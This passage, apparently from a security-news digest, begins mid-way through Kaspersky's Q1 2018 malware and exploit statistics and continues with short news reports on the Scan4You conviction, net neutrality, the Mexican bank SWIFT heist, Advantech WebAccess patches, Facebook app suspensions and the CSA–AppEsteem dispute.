8 Trojan-Banker.AndroidOS.Svpeng.ai 4.54
9 Trojan-Banker.AndroidOS.Agent.di 4.31
10 Trojan-Banker.AndroidOS.Asacub.ar 3.52
* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile antivirus that were attacked by banking threats.

The most popular mobile banking Trojan in Q1 was Asacub.bj (12.36%), nudging ahead of second-place Svpeng.q (9.17%). Both these Trojans use phishing windows to steal bank card and authentication data for online banking. They also steal money through SMS services, including mobile banking.

Note that the TOP 10 mobile banking threats in Q1 is largely made up of members of the Asacub (4 out of 10) and Svpeng (3 out of 10) families. However, Trojan-Banker.AndroidOS.Faketoken.z also entered the list. This Trojan has extensive spy capabilities: it can install other apps, intercept incoming messages (or create them on command), make calls and USSD requests, and, of course, open links to phishing pages.

Geography of mobile banking threats in Q1 2018 (percentage of attacked users)

TOP 10 countries by share of users attacked by mobile banking Trojans

Country* %**
1 Russia 0.74
2 USA 0.65
3 Tajikistan 0.31
4 Uzbekistan 0.30
5 China 0.26
6 Turkey 0.22
7 Ukraine 0.22
8 Kazakhstan 0.22
9 Poland 0.17
10 Moldova 0.16
* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab’s mobile antivirus in this country.

The Q1 2018 rating was much the same as the situation observed throughout 2017: Russia (0.74%) remained top.

The US (0.65%) and Tajikistan (0.31%) took silver and bronze, respectively. The most popular mobile banking Trojans in these countries were various modifications of the Trojan-Banker.AndroidOS.Svpeng family, as well Trojan-Banker.AndroidOS.Faketoken.z.

Mobile ransomware Trojans
In Q1 2018, we detected 8,787 installation packages for mobile ransomware Trojans, which is just over half the amount seen in the previous quarter and 22 times less than in Q2 2017. This significant drop is largely because attackers began to make more use of droppers in an attempt to hinder detection and hide the payload. As a result, such malware is detected as a dropper (for example, from the Trojan-Dropper.AndroidOS.Hqwar family), even though it may contain mobile ransomware or a “banker.”

Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab (Q2 2017 – Q1 2018)

Note that despite the decline in their total number, ransomware Trojans remain a serious threat — technically they are now far more advanced and dangerous. For instance, Trojan-Trojan-Ransom.AndroidOS.Svpeng acquires device administrator rights and locks the smartphone screen with a PIN if an attempt is made to remove them. If no PIN is set (could also be a graphic, numeric, or biometric lock), the device is locked. In this case, the only way to restore the smartphone to working order is to reset the factory settings.

The most widespread mobile ransomware in Q1 was Trojan-Ransom.AndroidOS.Zebt.a — it was encountered by more than half of all users. In second place was Trojan-Ransom.AndroidOS.Fusob.h, having held pole position for a long time. The once popular Trojan-Ransom.AndroidOS.Svpeng.ab only managed fifth place, behind Trojan-Ransom.AndroidOS.Egat.d and Trojan-Ransom.AndroidOS.Small.snt. Incidentally, Egat.d is a pared-down version of Zebt.a, both have the same creators.

Geography of mobile ransomware Trojans in Q1 2018 (percentage of attacked users)

TOP 10 countries by share of users attacked by mobile ransomware Trojans:

Country* %**
1 Kazakhstan 0.99
2 Italy 0.64
3 Ireland 0.63
4 Poland 0.61
5 Belgium 0.56
6 Austria 0.38
7 Romania 0.37
8 Hungary 0.34
9 Germany 0.33
10 Switzerland 0.29
* Excluded from the rating are countries where the number of users of Kaspersky Lab’s mobile antivirus is relatively small (fewer than 10,000)
** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.

First place in the TOP 10 again went to Kazakhstan (0.99%); the most active family in this country was Trojan-Ransom.AndroidOS.Small. Second came Italy (0.64%), where most attacks were the work of Trojan-Ransom.AndroidOS.Zebt.a, which is also the most popular mobile ransomware in third-place Ireland (0.63%).

Vulnerable apps used by cybercriminals
In Q1 2018, we observed some major changes in the distribution of exploits launched against users. The share of Microsoft Office exploits (47.15%) more than doubled compared with the average for 2017. This is also twice the quarterly score of the permanent leader in recent years — browser exploits (23.47%). The reason behind the sharp increase is clear: over the past year, so many different vulnerabilities have been found and exploited in Office applications, that it can only be compared to amount of Adobe Flash vulnerabilities found in the past. But lately the share of Flash exploits has been decreasing (2.57% in Q1), since Adobe and Microsoft are doing all they can to hinder the exploitation of Flash Player.

Distribution of exploits used in attacks by type of application attacked, Q1 2018

The most frequently used vulnerability in Microsoft Office in Q1 was CVE-2017-11882 — a stack overflow-type vulnerability in Equation Editor, a rather old component in the Office suite. Attacks using this vulnerability make up approximately one-sixth of all exploit-based attacks. This is presumably because CVE-2017-11882 exploitation is fairly reliable. Plus, the bytecode processed by Equation Editor allows the use of various obfuscations, which increases the chances of bypassing the protection and launching a successful attack (Kaspersky Lab’s Equation file format parser easily handles all currently known obfuscations). Another vulnerability found in Equation Editor this quarter was CVE-2018-0802. It too is exploited, but less actively. The following exploits for logical vulnerabilities in Office found in 2017 were also encountered: CVE-2017-8570, CVE-2017-8759, CVE-2017-0199. But even their combined number of attacks does not rival CVE-2017-11882.

As for zero-day exploits in Q1, CVE-2018-4878 was reported by a South Korean CERT and several other sources in late January. This is an Adobe Flash vulnerability originally used in targeted attacks (supposedly by the Scarcruft group). At the end of the quarter, an exploit for it appeared in the widespread GreenFlash Sundown, Magnitude, and RIG exploit kits. In targeted attacks, a Flash object with the exploit was embedded in a Word document, while exploit kits distribute it via web pages.

Large-scale use of network exploits using vulnerabilities patched by the MS17-010 update (those that exploited EternalBlue and other vulnerabilities from the Shadow Brokers leak) also continued throughout the quarter. MS17-010 exploits account for more than 25% of all network attacks that we registered.

Malicious programs online (attacks via web resources)
The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected.

Online threats in the financial sector
Q1 events
In early 2018, the owners of the Trojan Dridex were particularly active. Throughout its years-long existence, this malware has acquired a solid infrastructure. Today, its main line of activity is compromising credentials for online banking services with subsequent theft of funds from bank accounts. Its accomplice is fellow banking Trojan Emotet. Discovered in 2014, this malware also belongs to a new breed of banking Trojans developed from scratch. However, it was located on the same network infrastructure as Dridex, suggesting a close link between the two families. But now Emotet has lost its banking functions and is used by attackers as a spam bot and loader with Dridex as the payload. Early this year, it was reported that the encryptor BitPaymer (discovered last year) was developed by the same group behind Dridex. As a result, the malware was rebranded FriedEx.

Q1 saw the arrest of the head of the criminal group responsible for the Carbanak and Cobalt malware attacks, it was reported by Europol. Starting in 2013, the criminal group attacked more than 40 organizations, causing damage to the financial industry estimated at more than EUR 1 billion. The main attack vector was to penetrate the target organization’s network by sending employees spear-phishing messages with malicious attachments. Having penetrated the internal network via the infected computers, the cybercriminals gained access to the ATM control servers, and through them to the ATMs themselves. Access to the infrastructure, servers, and ATMs allowed the cybercriminals to dispense cash without the use of bank cards, transfer money from the organisation to criminal accounts, and inflate bank balances with money mules being used to collect the proceeds.

Financial threat statistics
These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. As of Q1 2017, the statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats.

In Q1 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 204,448 users.

Number of unique users attacked by financial malware, Q1 2018

Geography of attacks
To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.

Geography of banking malware attacks in Q1 2018 (percentage of attacked users)

TOP 10 countries by percentage of attacked users

Country* % of users attacked**
1 Cameroon 2.1
2 Germany 1.7
3 South Korea 1.5
4 Libya 1.5
5 Togo 1.5
6 Armenia 1.4
7 Georgia 1.4
8 Moldova 1.2
9 Kyrgyzstan 1.2
10 Indonesia 1.1
These statistics are based on Anti-Virus detection verdicts received from users of Kaspersky Lab products who consented to provide statistical data.
Excluded are countries with relatively few Kaspersky Lab’ product users (under 10,000).
** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country.

TOP 10 banking malware families
TOP 10 malware families used to attack online banking users in Q1 2018 (by share of attacked users):

Name Verdicts* % of attacked users**
1 Zbot Trojan.Win32. Zbot 28.0%
2 Nymaim Trojan.Win32. Nymaim 20.3%
3 Caphaw Backdoor.Win32. Caphaw 15.2%
4 SpyEye Backdoor.Win32. SpyEye 11.9%
5 NeutrinoPOS Trojan-Banker.Win32.NeutrinoPOS 4.5%
6 Emotet Backdoor.Win32. Emotet 2.4%
7 Neurevt Trojan.Win32. Neurevt 2.3%
8 Shiz Backdoor.Win32. Shiz 2.1%
9 Gozi Trojan.Win32. Gozi 1.9%
10 ZAccess Backdoor.Win32. ZAccess 1.3%
* Detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data.
** Unique users attacked by this malware as a percentage of all users attacked by financial malware.

In Q1 2018, TrickBot departed the rating to be replaced by Emotet (2.4%), also known as Heodo. Trojan.Win32.Zbot (28%) and Trojan.Win32.Nymaim (20.3%) remain in the lead, while Trojan.Win32.Neurevt (2.3%), also known as Betabot, suffered a major slide. Meanwhile, Caphaw (15.2%) and NeutrinoPOS (4.5%) climbed significantly, as did their Q1 activity.

Cryptoware programs
Q1 events
Q1 2018 passed without major incidents or mass cryptoware epidemics. The highlight was perhaps the emergence and widespread occurrence of a new Trojan called GandCrab. Notable features of the malware include:

Use of C&C servers in the .bit domain zone (this top-level domain is supported by an alternative decentralized DNS system based on Namecoin technology)
Ransom demand in the cryptocurrency Dash
GandCrab was first detected in January. The cybercriminals behind it used spam emails and exploit kits to deliver the cryptoware to victim computers.

The RaaS (ransomware as a service) distribution model continues to attract malware developers. In February, for example, there appeared a new piece of ransomware called Data Keeper, able to be distributed by any cybercriminal who so desired. Via a special resource on the Tor network, the creators of Data Keeper made it possible to generate executable files of the Trojan for subsequent distribution by “affilate program” participants. A dangerous feature of this malware is its ability to automatically propagate inside a local network. Despite this, Data Keeper did not achieve widespread distribution in Q1.

One notable success in the fight against cryptoware came from Europe: with the assistance of Kaspersky Lab, Belgian police managed to locate and confiscate a server used by the masterminds behind the Trojan Cryakl. Following the operation, Kaspersky Lab was given several private RSA keys required to decrypt files encrypted with certain versions of the Trojan. As a result, we were able to develop a tool to assist victims.

Number of new modifications
In Q1 2018, there appeared several new cryptors, but only one, GandCrab, was assigned a new family in our classification. The rest, which are not widely spread, continue to be detected with generic verdicts.

Number of new cryptoware modifications, Q2 2017 – Q1 2018

The number of new modifications fell sharply against previous quarters. The trend indicates that cybercriminals using this type of malware are becoming less active.

Number of users attacked by Trojan cryptors
During the reporting period, Kaspersky Lab products blocked cryptoware attacks on the computers of 179,934 unique users. Despite fewer new Trojan modifications, the number of attacked users did not fall against Q3.

Number of unique users attacked by cryptors, Q1 2018

Geography of attacks

TOP 10 countries attacked by Trojan cryptors

Country* % of users attacked by cryptors**
1 Uzbekistan 1.12
2 Angola 1.11
3 Vietnam 1.04
4 Venezuela 0.95
5 Indonesia 0.95
6 Pakistan 0.93
7 China 0.87
8 Azerbaijan 0.75
9 Bangladesh 0.70
10 Mongolia 0.64
* Excluded are countries with relatively few Kaspersky Lab users (under 50,000).
** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country.

The makeup of the rating differs markedly from 2017. That said, most positions were again filled by Asian countries, while Europe did not have a single representative in the TOP 10 countries attacked by cryptors.

Despite not making the TOP 10 last year, Uzbekistan (1.12%) and Angola (1.11%) came first and second. Vietnam (1.04%) moved from second to third, Indonesia (0.95%) from third to fifth, and China (0.87%) from fifth to seventh, while Venezuela (0.95%) climbed from eighth to fourth.

TOP 10 most widespread cryptor families

Name Verdicts* % of attacked users**
1 WannaCry Trojan-Ransom.Win32.Wanna 38.33
2 PolyRansom/VirLock Virus.Win32.PolyRansom 4.07
3 Cerber Trojan-Ransom.Win32.Zerber 4.06
4 Cryakl Trojan-Ransom.Win32.Cryakl 2.99
5 (generic verdict) Trojan-Ransom.Win32.Crypren 2.77
6 Shade Trojan-Ransom.Win32.Shade 2.61
7 Purgen/GlobeImposter Trojan-Ransom.Win32.Purgen 1.64
8 Crysis Trojan-Ransom.Win32.Crusis 1.62
9 Locky Trojan-Ransom.Win32.Locky 1.23
10 (generic verdict) Trojan-Ransom.Win32.Gen 1.15
* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data.
** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors.

This quarter, the rating is again topped by WannaCry (38.33%), extending its already impressive lead. Second place was claimed by PolyRansom (4.07%), also known as VirLock, a worm that’s been around for a while. This malware substitutes user files with modified instances of its own body, and places victim data inside these copies in an encrypted format. Statistics show that a new modification detected in December immediately began to attack user computers.

The remaining TOP 10 positions are taken by Trojans already known from previous reports: Cerber, Cryakl, Purgen, Crysis, Locky, and Shade.

Countries that are sources of web-based attacks: TOP 10
The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q1 2018, Kaspersky Lab solutions blocked 796,806,112 attacks launched from Internet resources located in 194 countries worldwide. 282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components. These indicators are significantly higher than in previous quarters. This is largely explained by the large number of triggers in response to attempts to download web miners, which came to prominence towards the end of last year and continue to outweigh other web threats.

Distribution of web attack sources by country, Q1 2018

This quarter, Web Anti-Virus was most active on resources located in the US (39.14%). Canada, China, Ireland, and Ukraine dropped out of TOP 10 to be replaced by Luxembourg (1.33%), Israel (0.99%), Sweden (0.96%), and Singapore (0.91%).

Countries where users faced the greatest risk of online infection
To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of attacked users**
1 Belarus 40.90
2 Ukraine 40.32
3 Algeria 39.69
4 Albania 37.33
5 Moldova 37.17
6 Greece 36.83
7 Armenia 36.78
8 Azerbaijan 35.13
9 Kazakhstan 34.64
10 Russia 34.56
11 Kyrgyzstan 33.77
12 Venezuela 33.10
13 Uzbekistan 31.52
14 Georgia 31.40
15 Latvia 29.85
16 Tunisia 29.77
17 Romania 29.09
18 Qatar 28.71
19 Vietnam 28.66
20 Serbia 28.55
These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data.
* Excluded are countries with relatively few Kaspersky Lab users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

On average, 23.69% of Internet user computers worldwide experienced at least one Malware-class attack.

Geography of malicious web attacks in Q1 2018 (percentage of attacked users)

The countries with the safest surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%), and Cuba (4.44%).

Local threats
Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q1 2018, our File Anti-Virus detected 187,597,494 malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

The rating includes only Malware-class attacks. It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of attacked users**
1 Uzbekistan 57.03
2 Afghanistan 56.02
3 Yemen 54.99
4 Tajikistan 53.08
5 Algeria 49.07
6 Turkmenistan 48.68
7 Ethiopia 48.21
8 Mongolia 46.84
9 Kyrgyzstan 46.53
10 Sudan 46.44
11 Vietnam 46.38
12 Syria 46.12
13 Rwanda 46.09
14 Laos 45.66
15 Libya 45.50
16 Djibouti 44.96
17 Iraq 44.65
18 Mauritania 44.55
19 Kazakhstan 44.19
20 Bangladesh 44.15
These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data include detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera and phone memory cards, or external hard drives.
* Excluded are countries with relatively few Kaspersky Lab users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country.

On average, 23.39% of computers globally faced at least one Malware-class local threat in Q1.

The figure for Russia was 30.92%.

The safest countries in terms of infection risk included Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czech Republic (7.89%), Ireland (6.86%), and Japan (5.79%).


U.S. Jury Convicts Operator of Counter AV Service Scan4You
17.5.2018 securityweek  Crime

A 37-year-old Latvian resident was convicted by a U.S. jury on Wednesday for his role in the operation of a counter antivirus service named Scan4You. Sentencing is scheduled for September 21.

Ruslans Bondars, a citizen of the former USSR, had been residing in Riga, Latvia, when he was arrested in May 2017 along with Russian national Jurijs Martisevs. Martisevs was on a trip to Latvia when he was taken into custody.

Bondars and Martisevs were accused of running the Scan4You service, which helped cybercriminals test their malware to ensure that it would not be detected by cybersecurity products.

Bondars was convicted on Wednesday on one count of conspiracy to violate the Computer Fraud and Abuse Act (CFAA), one count of conspiracy to commit wire fraud, and one count of computer intrusion with intent to cause damage and aiding and abetting.

Martisevs pleaded guilty in March to conspiracy, for which he faces up to 5 years in prison, and aiding and abetting computer intrusions, for which he faces 10 years in prison. His sentencing is scheduled for July.

According to Trend Micro, whose experts helped authorities investigate Scan4You, the service was launched in 2009 and was active until the arrests of its operators. An unnamed individual from Great Falls, Virginia, was also allegedly involved.

Bondars (known online as b0rland and Borland) and Martisevs (known online as Garrik) started their cybercrime career in at least 2006, and they managed to turn Scan4You into one of the largest counter antivirus services, with thousands of customers.

Scan4You allowed cybercriminals to conduct 100,000 scans per month for $30 and $0.15 for single scans. The service was also popular among counter antivirus resellers such as Indetectables, RazorScanner and reFUD.me.

Trend Micro says Bondars and Martisevs were also involved with a shady online pharmacy and launched their own banking malware campaigns.

However, they did a poor job at hiding their identity. Bondars, for instance, used the same Gmail account to register command and control (C&C) domains for his banking malware and to create a Facebook account. The Gmail account contained his real name and profile photo.

According to authorities, Scan4You was used to test the malware involved in the massive 2013 breach at the U.S. retailer Target. The service was also used in the development of Citadel, a banking trojan that infected over 11 million computers worldwide, which resulted in over $500 million in fraud-related losses.


U.S. Senate Votes to Restore 'Net Neutrality' Rules
17.5.2018 securityweek  BigBrothers

The US Senate voted Wednesday to restore so-called "net neutrality" rules aimed at requiring all online data to be treated equally, the latest step in a years-long battle on internet regulation.

The 52-47 vote is likely to be symbolic, however, since the measure faces an uphill battle in the House of Representatives and would need enough lawmaker support to overturn a probable presidential veto.

The vote marked the latest step in a contentious fight over rules governing online access over the past decade including court challenges and various moves by regulators.

Related: Security Implications of the End of Net Neutrality

In December, the Federal Communications Commission voted 3-2 along party lines to reverse a 2015 order which established net neutrality and which itself had faced court challenges and intense partisan debate.

In the Senate, three Republicans joined Democrats in the vote under the Congressional Review Act, which allows lawmakers to overturn a regulatory body.

FCC chairman Ajit Pai, appointed by President Donald Trump, has argued that the 2015 rules were "heavy-handed" and failed to take into account the rapidly changing landscape for online services and were discouraging investment in advanced networks.

Net neutrality backers have argued that clear rules are needed to prevent internet service providers from blocking or throttling services or websites for competitive reasons.

Some activists fear internet service providers will seek to extract higher fees from services that are heavy data users, like Netflix or other streaming services, with these costs passed on to consumers.

The battle has been largely along party lines, and has also been split with large tech firms supporting neutrality and telecom operators backing more flexible rules.

Although the Senate vote may not succeed in restoring neutrality rules, backers said it would allow voters to know where their lawmakers stand.

Democratic Senator Ed Markey said on Twitter the vote would "show the American people who sides with them, and who sides with the powerful special interests and corporate donors who are thriving under the @realDonaldTrump administration."

Ferras Vinh of the Center for Democracy & Technology, a digital rights group, welcomed the vote.

"Without net neutrality protections, internet service providers will have an explicit license to block, slow, or levy tolls on content, which will limit choices for internet users and suffocate small businesses looking to enter the market," Vinh said.

"These protections are the guiding principles of the open internet, facilitating innovation and enabling the spread of new ideas."

But USTelecom, an industry group representing major broadband carriers, expressed disappointment.

"This vote throws into reverse our shared goal of maintaining an open, thriving internet," said association president Jonathan Spalter.

"Consumers want permanent, comprehensive online protections, not half measures or election-year posturing from our representatives in Congress."


Mexican central bank confirmed that SWIFT hackers stole millions of dollars from Mexican Banks
17.5.2018 securityaffairs Hacking

The head of the Mexican central bank, Alejandro Diaz de Leon announced this week that hackers were involved in shadowy transfers of between $18 million and $20 million.
Mexican central bank is the last victim of the SWIFT hackers, officials at the bank confirmed this week that hackers hit the payments system and stole millions of dollars from domestic banks.

The attack was discovered in late April and presents many similarities with past attacks against the SWIFT systems.

The Mexican central bank did not disclose the name of the banks that were hit by the cyber attack and did not detail the overall amount of money that crooks have stolen.

According to Alejandro Diaz de Leon, head of Mexico’s central bank, crooks were able to complete illicit transactions of $18 million to $20 million.

“Central bank Governor Alejandro Diaz de Leon said on Monday that the country had seen an unprecedented attack on payment system connections and that he hoped that measures being taken would stop future incidents.” reported the Reuters.

“A source close to the government’s investigation said more than 300 million had been siphoned out of banks, but it was not clear how much had subsequently been taken out in cash withdrawals.”

Mexican central bank cyberheist

According to reports, Mexico’s central following the latest cyber attacks has created a cybersecurity division, and it has instituted a one-day waiting period on electronic funds transfers of more than $2,500.

“Perhaps, some financial institutions perceived the attacks in Bangladesh as something very distant,” said Alejandro Diaz de Leon who believes that some Mexican banks may not have invested in sufficient security measures.

“But criminals look for vulnerability and once they see it they are going to exploit it.”

Mexican depositors won’t be affected, but the overall losses for the local banks could be greater than initially thought.


Critical Code Execution Flaws Patched in Advantech WebAccess

16.5.2018 securityweek  Vulnerebility

Taiwan-based industrial automation company Advantech has released an update for its WebAccess product to address nearly a dozen vulnerabilities, including critical flaws that allow arbitrary code execution.

Advantech WebAccess is a browser-based software package for human-machine interfaces (HMI) and supervisory control and data acquisition (SCADA) systems. The product is used in the United States, Europe and East Asia in the energy, critical manufacturing, and water and wastewater sectors.

The list of security holes rated critical includes unrestricted file upload, path traversal, stack-based buffer overflow, and untrusted pointer dereference issues, all of which can be exploited for arbitrary code execution.

Advantech has also fixed high severity vulnerabilities that can be exploited to obtain sensitive information, modify files, and delete files. There are also a couple of medium severity issues that can be leveraged to steal session cookies and obtain potentially sensitive data through SQL injection.

According to ICS-CERT, the flaws affect WebAccess versions V8.2_20170817 and prior, WebAccess V8.3.0 and prior, WebAccess Dashboard V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior. The vendor patched them with the release of version 8.3.1 last week.

ICS-CERT has credited researchers Mat Powell, Andrea Micalizzi (rgod), Steven Seeley, Donato Onofri and Simone Onofri for discovering the security bugs. Many of the weaknesses were reported through Trend Micro’s Zero Day Initiative (ZDI), which will publish advisories in the coming weeks.

Seeley has identified tens of vulnerabilities in WebAccess this year, and some of them, affecting WebAccess HMI Designer, were disclosed in April before Advantech released patches.

ICS-CERT has published a total of four advisories for Advantech WebAccess vulnerabilities this year, including two in January.

A report published last year by Trend Micro’s Zero Day Initiative (ZDI) showed that it had taken Advantech, on average, 131 days to patch vulnerabilities, which was significantly better compared to many other major ICS vendors. ZDI published more than 50 advisories for Advantech vulnerabilities in 2017, which was roughly half the number published in the previous year.


Facebook Suspends 200 Apps Over Data Misuse
16.5.2018 securityweek 
Social

Facebook said Monday it has suspended "around 200" apps on its platform as part of an investigation into misuse of private user data.

The investigation was launched after revelations that political consulting firm Cambridge Analytica hijacked data on some 87 million Facebook users as it worked on Donald Trump's 2016 campaign.

"The investigation process is in full swing," said an online statement from Facebook product partnerships vice president Ime Archibong.

"We have large teams of internal and external experts working hard to investigate these apps as quickly as possible. To date thousands of apps have been investigated and around 200 have been suspended -- pending a thorough investigation into whether they did in fact misuse any data."

Archibong added that "where we find evidence that these or other apps did misuse data, we will ban them and notify people via this website."

The revelations over Cambridge Analytica have prompted investigations on both sides of the Atlantic and led Facebook to tighten its policies on how personal data is shared and accessed.

Facebook made a policy change in 2014 limiting access to user data but noted that some applications still had data it had obtained prior to the revision.

"There is a lot more work to be done to find all the apps that may have misused people's Facebook data -- and it will take time," Archibong said.


Behind the Scenes in the Deceptive App Wars
16.5.2018 securityweek  Security

All is not well in the app ecosphere. That ecosphere comprises a large number of useful apps that benefit users, and an unknown number of apps that deceive users. The latter are sometimes described potentially unwanted programs, or PUPs. Both categories need to make money: good apps are upfront with how this is achieved; deceptive apps hide the process.

In recent years there has been an increasing effort to cleanse the ecosphere of deceptive apps. The anti-virus (AV) industry has taken a more aggressive stance in flagging and sometimes removing what it calls PUPs; the Clean Software Alliance (CSA) was founded to help guide app developers away from the dark side; and a new firm, AppEsteem, certifies good apps and calls out bad apps in its ‘Deceptor’ program.

One name figures throughout: Dennis Batchelder. He is currently president of the AV-dominated Anti-Malware Testing Standards Organization (AMTSO); was a leading light in the formation, and until recently a member of the advisory board, of the CSA; and is the founder of AppEsteem.

But there has been a falling out between the CSA and AppEsteem.

The CSA
The CSA was officially launched in the Fall of 2015, although it had already been on the drawing board for over a year. Batchelder was instrumental in getting it started while he was working for Microsoft, where he was director, program management until April 2016.

The CSA was introduced during VB2015 with a joint presentation from Microsoft and Google, demonstrating early support from the industry’s big-hitters.

“As a 501(c)(6) nonprofit trade association,” writes the CSA on its website, “the CSA works to advance the interests of the software development community through the establishment and enforcement of guidelines, policies and technology tools that balance the software industry’s needs while preserving user choice and user control.”

In other words, it seeks to develop an app ecosphere where honest developers can be fairly recompensed, via monetization, for their labor. However, it provides very little information on its website. It does not, for example, list the members of the trade association, nor give any indication on how it will enforce its guidelines and policies on recalcitrant apps.

AppEsteem
Founded by Batchelder in 2016, AppEsteem is primarily an app certification organization – it certifies clean apps. However, since a carrot works best when supported by a stick, AppEsteem also calls out those apps it considers to be deceptive and therefore potentially harmful to users.

Batchelder hoped that the CSA and AppEsteem could work together (he was on the advisory board of the former and is president of the latter). The CSA could provide recommendations and industry support on classification criteria, and AppEsteem – at one step removed – could provide the enforcement element apparently missing in the CSA.

AppEsteem maintains what it calls the ‘deceptor list’; a list of apps that in its own judgement use deceptive means to increase their monetization potential. At the time of writing, there are more than 300 apps on the deceptor list. It also actively encourages AV firms to use this list in their own attempts at blocking PUPs.

There is a difficult balance. Deceptive app developers will object to being included on a public shaming list. Apps that get clean need to be removed in a timely fashion. New methods of deception need to be recognized and included in the bad behavior criteria.

It is, in short, a process wide open for criticism from app developers who are called out.

CSA criticizes AppEsteem
Criticism came last week from an unexpected source – from the CSA. On 10 May 2018, the CSA published a remarkably negative report on AppEsteem’s ‘deceptor’ program titled, CSA Review of AppEsteem Programs. It was, said the CSA, “triggered by a groundswell of complaints and expressions of concern received by the CSA from industry members regarding this program.”

The report is largely – although not entirely – negative. It raises some interesting points. The ‘groundswell of complaints’ is to be expected; particularly from the apps and the app developers called out for being deceptive.

However, concern over some other elements seem valid. AppEsteem does not seem keen to call out AV products, even when they appear to use ‘deceptive’ practices (consider, for example, the ease with which the user can download one product and find that McAfee has also been downloaded).

Furthermore, if certification is annual, a certified app could introduce deceptive practices immediately after certification that would go undetected (would effectively be allowed) for 12 months. “There is no more deceptive or risky behavior than that,” notes the report.

The CSA report makes four proposals. AppEsteem should: refocus efforts on certification; work with the CSA to devise consensus‐built ‘minbar’ criteria; balance violator identification and remediation; and embrace oversight and dispute resolution.

‘Oversight’ implies external management. Refocusing on certification implies abandoning the deceptor app listing. And ‘work with the CSA’ implies that AppEsteem should take its direction from the CSA. If not quite a power grab, the report attempts to neutralize the enforcement element of AppEsteem.

AppEsteem’s response
AppEsteem’s first response was for Batchelder to resign from the CSA advisory board. “I unable to figure out how to remain on the CSA Advisory Board in good conscience,” he wrote to the CSA. “Which sucks, as I’ve pushed for CSA to get operational and remain relevant, sent potential members its way, and worked hard to help it succeed. But being an advisor of an incorporator-status organization who is conducting a ‘confidential’ investigation into AppEsteem’s certification program without involving AppEsteem makes no sense at all.”

AppEsteem’s second response was to establish CleanApps.org; which is effectively an alternative to the CSA. “AppEsteem needs CSA,” comments one source who asked to be anonymous, “or at least some organization that can provide guidelines and some kind of oversight of what AppEsteem is doing… It seems that this new player is in fact a company created by Dennis trying to get rid of CSA.”

That partly makes sense. If AppEsteem cannot work with the CSA, it must find a similar organization it can work with. “After I disengaged from CSA, Batchelder told SecurityWeek, “we realized that AppEsteem had to find a way to get the vendor voice and to reassure them that we’re doing things fairly (the stuff we had hoped CSA would do). So, I incorporated CleanApps.org and recruited its first board from some of our customers (I know, it’s like a soap opera), and then resigned/handed it over once the board launched. Our goal is that once CleanApps.org launches, we’ll give them insight into our operations.”

To the CSA, he wrote in February, “I wanted to let you know that we have determined that it’s in best interests of both ourselves, our customers, and the vendor community if we had oversight and a ‘voice’ specifically representing the vendor community… We won’t become a member or hold any position in CleanApps.org; they will self-govern.” (He has since made it clear that he does not mean ‘oversight’ in any controlling manner.)

AppEsteem’s position seems to be that the app ecosphere requires three organizations: AppEsteem to enforce good behavior among the app developers; the CSA to represent the market in which apps operate; and CleanApps to represent the apps and app developers.

But it is clearly concerned over the current relevance of the CSA. “I think the biggest hole with CSA,” Batchelder told SecurityWeek, “is that they never finished forming: it’s still just… as the only member, and what we felt was that when [that member] had an issue with us, CSA went negative… it’s problematic to us that they’re not formed after four years.”

If AppEsteem needs something like the CSA to be effective, the CSA needs something like AppEsteem to be relevant.

